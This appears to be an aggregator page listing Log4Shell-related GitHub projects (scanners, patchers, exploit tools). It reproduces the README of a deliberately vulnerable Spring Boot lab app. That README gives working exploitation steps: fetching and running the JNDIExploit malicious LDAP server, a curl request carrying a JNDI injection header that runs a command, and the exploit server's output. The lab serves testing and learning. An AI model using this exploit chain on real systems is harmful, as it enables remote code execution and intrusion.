LunaSec - Dependency Security Scanner that automatically notifies you about vulnerabilities like Log4Shell or node-ipc in your Pull Requests and Builds. Protect yourself in 30 seconds with the LunaTrace GitHub App: https://github.com/marketplace/lunatrace-by-lunasec/

Stars: ✭ 1,261 (+22.55%)

Mutual labels: log4shell

L4sh

Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

Stars: ✭ 260 (-74.73%)

Mutual labels: log4shell

Log4j-RCE-Scanner

Remote command execution vulnerability scanner for Log4j.

Stars: ✭ 200 (-80.56%)

Mutual labels: log4shell

log4shelldetect

Rapidly scan filesystems for Java programs potentially vulnerable to Log4Shell (CVE-2021-44228) or "that Log4j JNDI exploit" by inspecting the class paths inside files

Stars: ✭ 40 (-96.11%)

Mutual labels: log4shell

log4jscanwin

Log4j Vulnerability Scanner for Windows

Stars: ✭ 142 (-86.2%)

Mutual labels: log4shell

log4j2-rce-exploit

log4j2 remote code execution or IP leakage exploit (with examples)

Stars: ✭ 62 (-93.97%)

Mutual labels: log4shell

log4shell-finder

Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-17571, CVE-2022-23305, CVE-2022-23307 ... ) instances of log4j library. Excellent performance and low memory footprint.

Stars: ✭ 22 (-97.86%)

Mutual labels: log4shell

log4j-cve-2021-44228

Ansible detector scanner playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 Remote Code Execution - log4j (CVE-2021-44228)

Stars: ✭ 58 (-94.36%)

Mutual labels: log4shell

log4shell-tools

Tool that runs a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-2021-44228 and CVE-2021-45046

Stars: ✭ 55 (-94.66%)

Mutual labels: log4shell

logmap

Log4j jndi injection fuzz tool

Stars: ✭ 60 (-94.17%)

Mutual labels: log4shell

log4jshield

Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher

Stars: ✭ 13 (-98.74%)

Mutual labels: log4shell

log4j-detector

Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!

Stars: ✭ 622 (-39.55%)

Mutual labels: log4shell

HackLog4j

《HackLog4j-永恒之恶龙》致敬全宇宙最无敌的Java日志库！Tribute to the most invincible Java logging library in the universe!

Stars: ✭ 161 (-84.35%)

Mutual labels: log4shell

awesome-log4shell

An Awesome List of Log4Shell resources to help you stay informed and secure! 🔒

Stars: ✭ 194 (-81.15%)

Mutual labels: log4shell

Log4jPatcher

A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)

Stars: ✭ 43 (-95.82%)

Mutual labels: log4shell

Log4Shell sample vulnerable application (CVE-2021-44228)

This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1) and the JDK 1.8.0_181.

Running the application

Run it:

docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929

Exploitation steps

Note: This is highly inspired from the original LunaSec advisory. Run at your own risk, preferably in a VM in a sandbox environment.

Update (Dec 13th): The JNDIExploit repository has been removed from GitHub (presumably, not by GitHub)... Click Here to Download the version cached by the Wayback Machine.

Use JNDIExploit to spin up a malicious LDAP server

wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888

Then, trigger the exploit using:

# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:

[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200

To confirm that the code execution was successful, notice that the file /tmp/pwned.txt was created in the container running the vulnerable application:

$ docker exec vulnerable-app ls /tmp
...
pwned
...

Reference

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

Contributors

@christophetd @rayhan0x01

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

christophetd / log4shell-vulnerable-app

Programming Languages

Labels

Projects that are alternatives of or similar to log4shell-vulnerable-app

Log4Shell sample vulnerable application (CVE-2021-44228)

Running the application

Exploitation steps

Reference

Contributors